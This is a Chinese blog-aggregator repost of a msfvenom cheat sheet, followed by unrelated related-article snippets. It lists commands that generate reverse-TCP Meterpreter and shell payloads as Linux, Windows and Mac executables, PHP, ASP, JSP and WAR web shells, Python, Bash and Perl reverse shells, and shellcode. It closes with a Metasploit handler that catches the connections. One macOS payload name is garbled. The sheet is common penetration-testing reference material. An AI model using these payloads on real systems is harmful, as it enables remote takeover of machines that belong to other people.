2. 程式人生 > >msfvenom生成各種Payload命令

msfvenom生成各種Payload命令

阿新 發佈:2018-11-11

msfvenom生成各種Payload命令

  1. 在這裡插入圖片描述
msfvenom -l        列出所有模組,攻擊載荷

Binaries

linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86ell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho



Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php 

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp  

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads  

Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py  

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh 

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl




Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>




Handler



use exploit/multi/handler  
set PAYLOAD <Payload name>  
set LHOST <LHOST value>  
set LPORT <LPORT value>  
exploit

相關推薦

msfvenom生成各種Payload命令

msfvenom生成各種Payload命令 msfvenom -l 列出所有模組,攻擊載荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<You

msfvenom生成各類Payload命令

wan info ati sar scripting inner bash ret plan Often one of the most useful (and to the beginner underrated) abilities of Metasploit is t

msfvenom生成apk payload然後得到meterpreter shell

先生成一個payload,帶上meterpreter監聽的地址和埠: msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=80 -o msf.apk 由於大號埠在我的wif

msfvenom生成payload命令+內網透到外網

   進入msfconsole並選擇exploit/multi /handler。為所使用的相關有效負載執行'set payload'並配置所有必需的選項(LHOST,LPORT等)。 執行並等待有效負載執行。對於下面的示例,它是非常自我解釋但LHOST應填入您的IP地址(如果在網路內攻擊,則為LAN I

生成數字序列命令(7)

seq shuff 生成數字序列命令:seq,shuf7.1.seq功能:打印數字序列語法:seq [OPTION]... LAST seq [OPTION]... FIRST LAST seq [OPTION]... FIRST INCREMENT LAST常用選項:-f 使用prin

Java程序各種監控命令和排查方法

Java 排查 1、監控進程GC情況: jstat -gcutil pid 頻率例如:jstat -gcutil 3807 2s 2、監控CUP和內存:命令:top,vmstat,nmon工具:Jvisualvm ,Jprofile,perfnom,Btrace,loadrunner 3、監控IO:i

IntelliJ IDEA(快捷鍵):快速生成各種for迴圈

說在前面 手巧太慢,快捷鍵。 iterations 快捷鍵 Live Templates 其實下面介紹的所有for迴圈都在live templates裡面,當然可以自定義: 迭代器for迴圈 iter Iterate iterable | Array in J2

MAVEN各種常用命令

mvn -v //檢視版本   mvn archetype:create //建立 Maven 專案   mvn compile //編譯原始碼   mvn test-compile //編譯測試程式碼   mvn test //執行應用程式中的單元測試 &n

重新溫習:預生成事件命令列和生成後事件命令

      今天寫一點有關Visual Studio 2015使用技巧方面的文章,其實不只是VS2015,VS以前的版本也有這個功能,這個功能就是“VS預生成事件命令列 和 生成後事件命令列”。這個功能好久沒有使用了,居然在這個功能使用上也會陰溝翻船,整整把我折騰了多半天,藉著今天這個機會,今天我就把這個功能

使用msfvenom生成木馬

Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows

Android生成jar-----windows命令

一、編譯目錄 方法一、使用AS等編譯工具進行編譯成.class檔案,在App\build\intermediates\classes\release\tztSztLevel2SDK的目錄下 方法二、進入原始檔夾進行編譯  cd tztSztLevel2SDK  cd sr

grub2各種手動命令引導教程

手動引導ubuntu的iso映象檔案從而安裝ubuntu,grub>代表命令的開始 假設ubuntu映象在U盤的第一個分割槽的根目錄下即:(hd0,1)/ubuntu-18.04-desktop-amd64.iso 手動引導下可以按TAB鍵補全命令、目錄以及檔名

Linux下各種查詢命令(find, grep, which, whereis, locate)

find命令 find < path > < expression > < cmd > path: 所要搜尋的目錄及其所有子目錄。預設為當前目錄。expression: 所要搜尋的檔案的特徵。cmd: 對搜尋結果進行特定的處理。 如果什麼引數也不加,find預設搜尋當

通過設定規則生成各種單據編號(一)

顧名思義,根據規則生成單據編號,有一張編碼表和規則表。 1.首先,先建這兩張表: **SYS_SEQ:業務序列編碼表** CREATE TABLE SYS_SEQ ( ID NUMBER NOT NULL,

git 生成 patch的命令

個人理解: patch就是打補丁,通過git工具把程式碼的差分,生成patch檔案, 然後通過git工具可以直接把patch檔案的內容,merge到程式碼裡面。 生成patch的命令 git dif

Python3 NumPy陣列生成的簡單命令

匯入NumPyimport numpy as np建立全為0的陣列np.zeros((3,3))建立全為1的陣列np.ones((2,3,4))建立單位矩陣np.eyes(3)一維等差陣列np.arange(6)轉換成二維np.arange(6).reshape(2,3)一維

重新生成Homestead配置命令

在我們每次對 Homestead.yaml 檔案進行了更改之後,都需要執行下面命令來使其更改生效: Administrator@USER-20170710DI MINGW64 ~ $ cd ~/Homestead && vagrant pr

[AIR] 打包生成APK的命令

有個產品業務需要,AIR製作的android的應用,但是客戶提出的是單機版的需求,沒有網路環境,但是裡面的資料又需要經常更新。 所有有了以下產品結構思路: AIR製作的安卓應用,只是一個功能框架,資料全部獨立在一個assets目錄裡,這個assets目錄就是客戶需要更新的資

win7,64位,Visual Studio 2013安裝openssl以及生成生成各種證書

先講幾點,jdk 下的 keytool 雖然也可以生成證書,但是不能模擬 ca 認證,所以就功能上來講還是 openssl 強大一點。接下來講講我為什麼要這個認證,我是在本地伺服器上搭建一個網站,需要使用 https ,要開啟這個的話就需要數字證書,雖然有免費的數字證書,但

通過System.CommandLine快速生成支持命令行的應用

net zh-cn consola http 開發者 ons comm https ima 一直以來,當我們想讓我們的控制臺程序支持命令行啟動時,往往需要編寫大量代碼來實現這一看起來很簡單的功能。雖然有一些庫可以簡化一些操作,但整個過程仍然是一個相當枯燥而乏味的過程。我之前